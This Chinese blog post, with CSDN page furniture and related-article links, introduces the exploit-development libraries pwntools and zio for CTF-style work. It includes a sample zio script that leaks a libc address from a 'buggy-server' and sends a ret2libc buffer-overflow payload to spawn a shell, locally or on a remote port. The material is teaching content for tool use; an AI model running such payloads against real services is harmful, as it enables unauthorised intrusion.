编写poc和exploit的几款常用工具介绍

最新推荐文章于 2024-02-02 00:16:58 发布
VIP文章 最新推荐文章于 2024-02-02 00:16:58 发布
阅读量1.9w 收藏 17
点赞数 1
分类专栏: Android安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/koozxcv/article/details/51644476
版权

1.pwntools

pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。

pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。

sudo pip install pwntools即可安装

如果安装过程中提示缺少相应的库,应该都可以很容易的google到解决方法。

安装完成后执行以下命令来检测是否成功: 

import pwn
>>> pwn.asm("xor eax,eax")
'1\xc0'
如果执行结果和上面相同,则说明安装成功,pwn模块现在可以使用了。

2.zio

pwntools和zio两者均是用python开发的exp编写工具,同时方便了远程exp和本地exp的转换  sudo pip install zio即可安装

zio is an easy-to-use io library for pwning development, supporting an unified interface for local process pwning and TCP socket io.

The primary goal of zio is to provide unified io interface between process stdin/stdout and TCP socket io. So when you have done local pwning development, you only need to change the io target to pwn the remote server.

The following code illustrate the basic idea.

from zio import *

if you_are_debugging_local_server_binary:
    io = zio('./buggy-server')            # used for local pwning development
elif you_are_pwning_remote_server:
    io = zio(('1.2.3.4', 1337))           # used to exploit remote service

io.write(your_awesome_ropchain_or_shellcode)
# hey, we got an interactive shell!
io.interact()
from zio import *
io = zio('./buggy-server')
# io = zio((pwn.server, 1337))

for i in xrange(1337):
    io.writeline('add ' + str(i))
    io.read_until('>>')

io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
io.read_until('A' * 49)
libc_base = l32(io.read(4)) - 0x1a9960
libc_system = libc_base + 0x3ea70
libc_binsh = libc_base + 0x15fcbf
payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
io.write('info ' + payload + "\nshow\nexit\n")
io.read_until(">>")
# We've got a shell;-)
io.interact()

最低0.47元/天 解锁文章
koozxcv
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
zio-process:一个简单的ZIO库,用于与外部流程和命令行程序进行交互
02-13
齐奥过程 | 概括 基于ZIO的纯功能命令和过程库。 文献资料 贡献 行为守则 参见 支持 来和我们聊天 。 执照
如何编写POC/EXP
weixin_45626840的博客
01-10 2428
理解并编写POC/EXP
EXP脚本编写
m0_62207482的博客
01-27 759
EXP脚本的编写POC脚本编写一样,只需要修改_attack部分,替换成漏洞 利用的脚本即可。Flask漏洞主要利用了框架的特点,在Flask中,“ {{}}” 中的内容会被当作代码 执行,相应的防御中就需要对“ {{}}”进行过滤,禁止此符号传入参数中。利用Pocsuite 3开源框架,可以接收用户输入的命令行参数,对目标系统进行 半交互控制,具体实现过程如下所示。首先,根据官方文档说明,编写一个接收自定义命令的函数,将接收到的命 令赋值给command参数。,最终效果如 图3-5所示。
Pocsuite3框架POC/EXP编写练习:Flask(Jinja2) 服务端模板注入漏洞
qq_46145027的博客
04-19 816
Pocsuite3 是由打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架。可以用来编写POC/EXP,今天借助Flask框架下的SSTI漏洞练习记录一下Pocsuite3框架的配置和编写过程。
python编写EXP/POC速成小记
U_U520的博客
02-22 1851
find() 方法检测字符串中是否包含子字符串 str ,如果指定 beg(开始) 和 end(结束) 范围,则检查是否包含在指定范围内,如果包含子字符串返回开始的索引值,否则返回-1。上述脚本存在误报,就是payload只有一个单引号闭合,没办法检验数字型sql,双引号型,’)型,’))等在payload中多加几个类型,可以直接导入自己的FUZZ字典。漏洞刚被批漏之后,有时候现有的工具里面是没有相应的EXP的,那我们可以根据原理写出对应的EXP代码,验证漏洞是否存在。不然会出现报错不适用。
如何使用Python快速编写批量POC/EXP脚本(无脑版)
最新发布
Liyu_6618的博客
02-02 517
如何使用Python快速编写批量POC/EXP脚本(无脑版)
渗透中POCEXP、Payload、Shellcode和exploit的区别
weixin_45116657的博客
10-10 3498
1、POCEXP、Payload与Shellcode POC:全称 ’ Proof of Concept ',中文 ’ 概念验证 ’ ,常指一段漏洞证明的代码。 . EXP:全称 ’ Exploit ',中文 ’ 利用 ',指利用系统漏洞进行攻击的动作。 . Payload:中文 ’ 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 . Shellcode:简单翻译 ’...
Pocsuite3工具介绍
m0_58001548的博客
05-30 1387
Pocsuite3 基于 Python3 开发,可以运行在支持 Python 3.7+ 的任何平台上,例如 Linux、Windows、MacOS、BSD 等。2021 年 11 月,Pocsuite3 通过了 Debian 官方的代码及合规检查,正式加入 Debian、Ubuntu、Kali 等 Linux 发行版的软件仓库,可以通过 apt 命令一键获取。
内网渗透-src挖掘-外网打点到内网渗透-3层内网渗透测试记录(2)-2023年1月
qq1140037586的博客
01-13 1019
内网渗透-src挖掘-外网打点到内网渗透-3层内网渗透测试记录(2)-2023年1月
shiro反序列化漏洞(CVE-2016-4437)
iO快到碗里来
09-14 4552
0x00 Java安全 一 、RMI/JRMP协议 TCP/IP协议相信大家都很了解了,不了解的可以自行百度。在这里我们先来简单来讲讲JRMP协议相关内容。JRMP是一个Java远程方法协议,该协议基于TCP/IP之上,RMI协议之下。也就是说RMI协议传递时底层使用的是JRMP协议,
谷歌发布基于浏览器的 Spectre 攻击的 PoC exploit
smellycat000的专栏
03-16 273
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队上周,谷歌发布旨在利用臭名昭著的 Spectre 漏洞并从 web 浏览器泄露信息的 PoC 代码。Spectre 漏洞最初在...
PoC-Exploits:选择软件漏洞的概念验证漏洞,以帮助识别和测试易受攻击的系统
04-22
PoC漏洞 为软件漏洞选择概念验证漏洞和入侵检测规则,以帮助识别,测试和缓解易受攻击的系统。 当CERT / CC在一个VU#下发布多个相互关联的CVE时,PoC由CVE或VU#组织。
渗透测试常用poc工具集合
01-06
poc包含近100多个常用的poc,还有很多工具集。全是博主自己用的,现在免费分享,下面是列举的前10个poc: CVE-2019-0708-msf快速搭建 CVE-2019-10173 Xstream 1.4.10版本远程代码执行漏洞 CVE-2019-16131 OKLite v...
CodeTest自动生成POC刷漏洞工具
02-28
CodeTest自动生成POC刷漏洞工具
大牛输出-渗透测试常用poc工具大集合.zip
08-13
超600MB资源, 渗透测试大牛资源分享
POC&EXP编写指南.rar
02-11
POC&EXP编写指南 详细讲述了POC&EXP编写方式,很实用
poc编写真实案例文档
07-21
poc编写真实案例文档
Android应用向su申请root权限,以及Superuser进行授权管理的原理浅析
热门推荐
koozxcv的博客
04-11 2万+
最近研究了好几天su+Superuser的源码,感觉大概梳理通了整个大体的思路框架,mark一下。  一.su和Suepruser进行root授权的处理流程 对于su命令行程序在对来自Android应用的Root权限请求处理流程大致如下图所示(因为快要找工作了,为了节约时间花了一副丑到哭的图片): 图中Android应用是申请Root权限的申请者,su命令行程序时Root权限拥有者,因su设
python编写POC脚本
04-03
抱歉,作为 AI 语言模型,我无法编写具体的 POC 脚本,但我可以提供一些编写 POC 脚本的基本思路和步骤: 1. 确定目标:了解目标系统的漏洞类型和版本等信息。 2. 收集信息:通过各种途径(如搜索引擎、漏洞库、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值